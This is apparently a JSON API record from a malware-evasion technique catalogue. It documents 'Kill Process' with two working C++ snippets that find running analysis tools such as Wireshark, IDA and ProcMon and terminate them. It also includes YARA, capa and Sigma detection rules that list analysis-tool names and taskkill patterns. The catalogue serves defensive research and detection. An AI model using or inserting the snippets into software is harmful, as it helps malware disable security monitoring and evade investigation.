GET /api/techniques/131/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "Kill Process",
    "category": [
        "https://search.unprotect.it/api/categories/6/"
    ],
    "description": "Malware can kill processes such as AV processes or monitoring processes. For example, \"wireshark.exe\", \"ida.exe\", \"procmon.exe\" or any other process related to malware analysis tools, in order to avoid investigation.",
    "resources": "https://www.bleepingcomputer.com/news/security/coinminer-comes-with-a-process-kill-list-to-keep-competitors-at-bay/",
    "tags": "kill",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/13/",
            "technique": "https://search.unprotect.it/api/techniques/131/",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <Psapi.h>\r\n#include <vector>\r\n#include <TlHelp32.h>\r\n\r\n#pragma comment(lib, \"Psapi\")\r\n#pragma comment(lib,\"ntdll.lib\")\r\n\r\ntypedef NTSTATUS(NTAPI* _NtGetNextProcess)(\r\n\t_In_ HANDLE ProcessHandle,\r\n\t_In_ ACCESS_MASK DesiredAccess,\r\n\t_In_ ULONG HandleAttributes,\r\n\t_In_ ULONG Flags,\r\n\t_Out_ PHANDLE NewProcessHandle\r\n\t);\r\n\r\nstd::vector<std::string> procs =\r\n{\r\n\t\"ProcessHacker.exe\", \r\n\t\"Wireshark.exe\"\r\n};\r\n\r\nauto terminate_process() -> void\r\n{\r\n\tHMODULE ntdll = GetModuleHandleA(\"ntdll.dll\");\r\n\tHANDLE currp = nullptr;\r\n\tchar buf[1024] = { 0 };\r\n\r\n\t_NtGetNextProcess NtGetNextProcess = (_NtGetNextProcess)GetProcAddress(ntdll, \"NtGetNextProcess\");\r\n\r\n\tfor (int i = 0; i < procs.size(); i++) {\r\n\t\tdo {\r\n\t\t\tGetModuleFileNameExA(currp, 0, buf, MAX_PATH);\r\n\t\t\tif (strstr(buf, procs[i].c_str()))\r\n\t\t\t\tTerminateProcess(currp, -1);\r\n\t\t} while (!NtGetNextProcess(currp, MAXIMUM_ALLOWED, 0, 0, &currp));\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tterminate_process();\r\n\treturn 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/131/",
            "description": "Using the `CreateToolhelp32Snapshot` API, it is possible to list the running processes and compare them with a blacklist, killing any that match.",
            "plain_code": "#include <iostream>\r\n#include <string>\r\n#include <tchar.h>\r\n#include <process.h>\r\n#include <windows.h>\r\n#include <tlhelp32.h>\r\n\r\nusing namespace std;\r\n\r\nBOOL GetProcessList();\r\nBOOL TerminateMyProcess(DWORD dwProcessId, UINT uExitCode);\r\n\r\nint main( void )\r\n{\r\n  GetProcessList( );\r\n  return 0;\r\n}\r\n\r\nBOOL GetProcessList( )\r\n{\r\n  HANDLE hProcessSnap;\r\n  HANDLE hProcess;\r\n  PROCESSENTRY32 pe32;\r\n  DWORD dwPriorityClass;\r\n\r\n  //Blacklisted processes\r\n  LPSTR ProcessName[] = { \"ida.Exe\",\r\n                          \"ProcMon.exe\",\r\n                          \"Olldbg.exe\",\r\n                          \"Wireshark.exe\",\r\n                          \"iexplore.exe\"\r\n                            };\r\n\r\n  // Take a snapshot of processes\r\n  hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );\r\n  if( hProcessSnap == INVALID_HANDLE_VALUE )\r\n  {\r\n    return( FALSE );\r\n  }\r\n\r\n  pe32.dwSize = sizeof( PROCESSENTRY32 );\r\n\r\n  if( !Process32First( hProcessSnap, &pe32 ) )\r\n  {\r\n    CloseHandle( hProcessSnap );\r\n    return( FALSE );\r\n  }\r\n\r\n  do\r\n  {\r\n    string str(pe32.szExeFile);\r\n\r\n    for (int i = 0; i < (sizeof(ProcessName) / sizeof(LPSTR)); i++)\r\n    {\r\n         if(str == ProcessName[i])\r\n         {\r\n             cout << \"[*] processus exists: \" << (ProcessName[i]) << endl;\r\n             TerminateBlacklistedProcess(pe32.th32ProcessID, 1);\r\n         }\r\n    }\r\n  } while( Process32Next( hProcessSnap, &pe32 ) );\r\n\r\n  CloseHandle( hProcessSnap );\r\n  return( TRUE );\r\n}\r\n\r\n// Terminate the blacklisted processes\r\nBOOL TerminateBlacklistedProcess(DWORD dwProcessId, UINT uExitCode)\r\n{\r\n    DWORD dwDesiredAccess = PROCESS_TERMINATE;\r\n    BOOL  bInheritHandle  = FALSE;\r\n    HANDLE hProcess = OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId);\r\n    if (hProcess == NULL)\r\n        return FALSE;\r\n\r\n    BOOL result = TerminateProcess(hProcess, uExitCode);\r\n\r\n    CloseHandle(hProcess);\r\n\r\n    return result;\r\n}"
        }
    ],
    "detection_rules": [
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_disable_process",
            "rule": "import \"pe\"\r\n\r\nrule UNPROTECT_disable_process\r\n{\r\n    meta:\r\n\tauthor = \"Thomas Roccia | @fr0gger_\"\r\n\tdescription = \"Disable blacklisted processes\"\r\n\r\n    strings:\r\n        $api1 = \"CreateToolhelp32Snapshot\" nocase\r\n        $api2 = \"Process32First\" nocase\r\n        $api3 = \"Process32Next\" nocase\r\n\r\n        $p1 = \"taskkill.exe\" nocase\r\n        $p2 = \"tskill.exe\" nocase\r\n\r\ncondition:\r\n        uint32(uint32(0x3C)) == 0x4550 and 3 of ($api*) or any of ($p*) \r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "kill_process",
            "rule": "rule:\r\n  meta:\r\n    name: reference analysis tools strings\r\n    namespace: anti-analysis\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: file\r\n    mbc:\r\n      - Discovery::Analysis Tool Discovery::Process Detection [B0013.001]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiAnalysis/process.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_\r\n  features:\r\n    - or:\r\n      - string: /ollydbg.exe/i\r\n      - string: /ProcessHacker.exe/i\r\n      - string: /tcpview.exe/i\r\n      - string: /autoruns.exe/i\r\n      - string: /autorunsc.exe/i\r\n      - string: /filemon.exe/i\r\n      - string: /procmon.exe/i\r\n      - string: /regmon.exe/i\r\n      - string: /procexp.exe/i\r\n      - string: /idaq.exe/i\r\n      - string: /idaq64.exe/i\r\n      - string: /ImmunityDebugger.exe/i\r\n      - string: /Wireshark.exe/i\r\n      - string: /dumpcap.exe/i\r\n      - string: /HookExplorer.exe/i\r\n      - string: /ImportREC.exe/i\r\n      - string: /PETools.exe/i\r\n      - string: /LordPE.exe/i\r\n      - string: /SysInspector.exe/i\r\n      - string: /proc_analyzer.exe/i\r\n      - string: /sysAnalyzer.exe/i\r\n      - string: /sniff_hit.exe/i\r\n      - string: /windbg.exe/i\r\n      - string: /joeboxcontrol.exe/i\r\n      - string: /joeboxserver.exe/i\r\n      - string: /ResourceHacker.exe/i\r\n      - string: /x32dbg.exe/i\r\n      - string: /x64dbg.exe/i\r\n      - string: /Fiddler.exe/i\r\n      - string: /httpdebugger.exe/i\r\n      - string: /fakenet.exe/i\r\n      - string: /netmon.exe/i\r\n      - string: /WPE PRO.exe/i\r\n      - string: /decompile.exe/i"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "kill_process",
            "rule": "title: Kill multiple process\r\nstatus: experimental\r\ndescription: Kill multiple process\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200039\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*'\r\n      condition: selection\r\nlevel: critical"
        }
    ]
}